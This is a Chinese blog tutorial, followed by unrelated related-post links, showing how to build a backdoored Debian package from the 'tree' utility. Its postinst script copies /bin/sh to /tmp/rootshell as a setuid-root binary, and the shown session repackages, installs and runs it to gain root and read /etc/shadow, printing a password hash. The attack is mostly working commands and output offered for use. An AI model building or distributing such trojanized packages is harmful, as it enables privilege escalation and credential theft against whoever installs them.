以下介绍怎样制作包括后门的deb安装包。以tree为例进行说明。利用apt-get下载安装包。--download-only表示仅仅下载不做其它处理。

root@deb:~#apt-get download --download-only tree

Get:1Downloading tree 1.6.0-1 [43.3 kB]

Fetched43.3 kB in 2s (21.4 kB/s)

root@deb:~#ls -l

total44

-rw-r--r--1 root root 43314 Feb 4 2012 tree_1.6.0-1_amd64.deb

解压deb安装包,并创建文件夹DEBIAN(大写),在DEBIAN文件夹下创建文件control和postinst。

Control。包括deb包说明信息,比如:包名,版本。平台。作者等。

[EN]:http://www.debian.org/doc/manuals/debian-faq/ch-pkg_basics.en.html

[CN]:http://www.debian.org/doc/manuals/debian-faq/ch-pkg_basics.zh-cn.html

Postinst。完毕Debian包文件解包文件的配置工作。通常,“postinst”脚本等待用户输入,或提醒用户。假设他接受当前默认值。要记得软件包安装完后返回又一次配置。很多“postinst”脚本负责运行有关命令为新安装或升级的软件重新启动服务。

root@deb:~#dpkg -x tree_1.6.0-1_amd64.deb tree_1.6.0-1_amd64

root@deb:~#mkdir ./tree_1.6.0-1_amd64/DEBIAN

root@deb:~#cd ./tree_1.6.0-1_amd64/DEBIAN/

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#touch control postinst

Control内容,可来源于dpkg–info
/path/to/debfile

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg --info /root/tree_1.6.0-1_amd64.deb

newdebian package, version 2.0.

size43314 bytes: control archive=664 bytes.

393bytes, 12 lines control

433bytes, 7 lines md5sums

Package:tree

Version:1.6.0-1

Architecture:amd64

Maintainer:Florian Ernst <florian@debian.org>

Installed-Size:109

Depends:libc6 (>= 2.3)

Section:utils

Priority:optional

Homepage:http://mama.indstate.edu/users/ice/tree/

Description:displays directory tree, in color

Displaysan indented directory tree, using the same color assignments as

ls,via the LS_COLORS environment variable.

终于control文件内容例如以下:

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#cat control

Package:tree

Version:1.6.0-1

Architecture:amd64

Maintainer:Florian Ernst <florian@debian.org>

Installed-Size:109

Depends:libc6 (>= 2.3)

Section:utils

Priority:optional

Homepage:http://mama.indstate.edu/users/ice/tree/

Description:displays directory tree, in color Displays an indented directorytree, using the same color assignments as ls, via the LS_COLORSenvironment
variable.

终于postinst脚本内容例如以下:

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#cat postinst

#!/bin/bash

sudo cp /bin/sh /tmp/rootshell && sudo chown root:root/tmp/rootshell && sudo chmod 4755 /tmp/rootshell

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#chmod 755 postinst

全部配置文件准备完毕后。使用dpkg-deb打包,成功创建包括后门的安装包tree_1.6.0-1_amd64.deb.

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /root/

total4

drwxr-xr-x4 root root 4096 Aug 26 06:17 tree_1.6.0-1_amd64

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg-deb --build /root/tree_1.6.0-1_amd64/

dpkg-deb:building package `tree' in `/root/tree_1.6.0-1_amd64.deb'.

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /root/

total48

drwxr-xr-x4 root root 4096 Aug 26 06:17 tree_1.6.0-1_amd64

-rw-r--r--1 root root 43156 Aug 26 06:28 tree_1.6.0-1_amd64.deb

安装后门deb包,创建/tmp/rootshell文件.

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /tmp/

total20

drwx------2 docker docker 4096 Aug 26 05:15 pulse-bmNZfTJ6gWCq

drwx------2 root root 4096 Aug 26 05:14 pulse-PKdhtXMmr18n

drwx------2 Debian-gdm Debian-gdm 4096 Aug 26 05:15 pulse-ZvmMH2Gn4QZR

drwx------2 docker docker 4096 Aug 26 05:15 ssh-qkrUkg0Dfu9v

drwxr-xr-x2 docker docker 4096 Aug 26 05:15 tracker-docker

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg -i /root/tree_1.6.0-1_amd64.deb

Selectingpreviously unselected package tree.

(Readingdatabase ... 130311 files and directories currently installed.)

Unpackingtree (from /root/tree_1.6.0-1_amd64.deb) ...

Settingup tree (1.6.0-1) ...

Processingtriggers for man-db ...

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /tmp/

total128

drwx------2 docker docker 4096 Aug 26 05:15 pulse-bmNZfTJ6gWCq

drwx------2 root root 4096 Aug 26 05:14 pulse-PKdhtXMmr18n

drwx------2 Debian-gdm Debian-gdm 4096 Aug 26 05:15 pulse-ZvmMH2Gn4QZR

-rwsr-xr-x1 root root 106920 Aug 26 06:29 rootshell

drwx------2 docker docker 4096 Aug 26 05:15 ssh-qkrUkg0Dfu9v

drwxr-xr-x2 docker docker 4096 Aug 26 05:15 tracker-docker

执行后门

docker@deb:/root/tree_1.6.0-1_amd64/DEBIAN$/tmp/rootshell

#id

uid=1000(docker)gid=1000(docker) euid=0(root)groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),105(scanner),110(bluetooth),112(netdev),1000(docker)

#head -1 /etc/shadow

root:$6$GiCLTee$AEFGgQdvK2LG3m7gtD6.HG39rIrkhh48P..234Xs3DFuxUJ/B7jfJO5mJryPCRmeW1sGHvgf6GT77ztJ.PHO31:16302:0:99999:7:::

#



參考链接:

http://pastebin.com/m5XULth7#

http://www.offensive-security.com/metasploit-unleashed/Binary_Linux_Trojan

create a backdoor deb package的更多相关文章

  1. AX7: CREATE AN AUTOMATED TEST PACKAGE\MODEL

    AX7: CREATE AN AUTOMATED TEST PACKAGE\MODEL It’s really important for a stable solution the use of a ...

  2. ROS学习手记 - 2.1: Create and Build ROS Package 生成包(Python)

    ROS学习手记 - 2.1: Create and Build ROS Package 生成包(Python) 时隔1年,再回来总结这个问题,因为它是ros+python开发中,太常用的一个操作,需要 ...

  3. Quickstart: Create and publish a package using Visual Studio (.NET Framework, Windows)

    https://docs.microsoft.com/en-us/nuget/quickstart/create-and-publish-a-package-using-visual-studio-n ...

  4. create a nodejs npm package

    1. create a folder named m1 2. run command: npm init, this will create the package.json file 3. crea ...

  5. make deb for debian/ubuntu, package software for debian/ubuntu

    here you may find useful information: =====================X8---------------------------------8X==== ...

  6. deb包的安装及dpkg命令小结

    DPKG commands There are two actions, they are dpkg-query and dpkg-deb. Install a package # sudo dpkg ...

  7. Ubuntu Linux: How Do I install .deb Packages?

    Ubuntu Linux: How Do I install .deb Packages? Ubuntu Linux: How Do I install .deb Packages? by Nix C ...

  8. 【Ubuntu 16】DEB软件包管理

    一.背景介绍 开源软件最早的时候没有软件包和软件包管理器,用户只能下载源码包自行配置 编译 安装. 后来linux各发行版本推出了软件包格式和软件包管理程序 Red Hat.Centos使用RPM格式 ...

  9. ubuntu deb pacakge 开发

    安装构建工具 apt-get install pbuilder 推荐安装 sudo apt-get install build-essential autoconf automake \ autoto ...

随机推荐

  1. java环境配置classpath和path变量的作用及设置方法

    1.path:指定cmd中命令执行文件所在的路径.比如javac.java两个可执行文件在jdk的bin目录下,如果path值含有这个bin目录,在cmd下执行这两个命令的时候就会到path指定的目录 ...

  2. 一步一步,完成sparkMLlib对日志文件的处理(1)

    https://blog.csdn.net/u012834750/article/details/81014997    初学第一天,当然是完成helloWorld啦,有点艰难,2个小时,在idea, ...

  3. C++调用有道翻译API实现在线翻译之发声篇

    大概半月前写了一篇博文:C++中使用Curl和JsonCpp调用有道翻译API实现在线翻译, 得到大家的热情捧场,有人看了文章说要是能发声不是更好,我觉得说的也是哈,能听到专家的标准发音,那该是多美的 ...

  4. HDU——1982Kaitou Kid - The Phantom Thief (1)(坑爹string题)

    Kaitou Kid - The Phantom Thief (1) Time Limit: 3000/1000 MS (Java/Others)    Memory Limit: 32768/327 ...

  5. BZOJ-2829 信用卡凸包

    凸包题. 我们先把所有信用卡的四个定点的坐标求出来,然后计算凸包长度,最后加上一个圆的周长就行. #include <cstdlib> #include <cstdio> #i ...

  6. [BZOJ3261] 最大异或和 (异或前缀和,可持久化Trie)

    Description 给定一个非负整数序列{a},初始长度为N. 有M个操作,有以下两种操作类型: 1.Ax:添加操作,表示在序列末尾添加一个数x,序列的长度N+1. 2.Q l r x:询问操作, ...

  7. iOS-多线程(3)

    多线程之GCD(grand central dispatch)中心调度 为了简化多线程的操作,iOS为我们提供了GCD来实现编程. 使用GCD只要遵守两个步骤即可: 创建对列(串行队列,并行队列) 将 ...

  8. 转 浅谈C++中指针和引用的区别

    浅谈C++中指针和引用的区别 浅谈C++中指针和引用的区别   指针和引用在C++中很常用,但是对于它们之间的区别很多初学者都不是太熟悉,下面来谈谈他们2者之间的区别和用法. 1.指针和引用的定义和性 ...

  9. 标准C程序设计七---71

    Linux应用             编程深入            语言编程 标准C程序设计七---经典C11程序设计    以下内容为阅读:    <标准C程序设计>(第7版) 作者 ...

  10. Devexpress控件中gridcontrol Drag a column header here to group by that column 更换

    参照网站:http://documentation.devexpress.com/#WPF/DevExpressXpfGridDataViewBase_RuntimeLocalizationStrin ...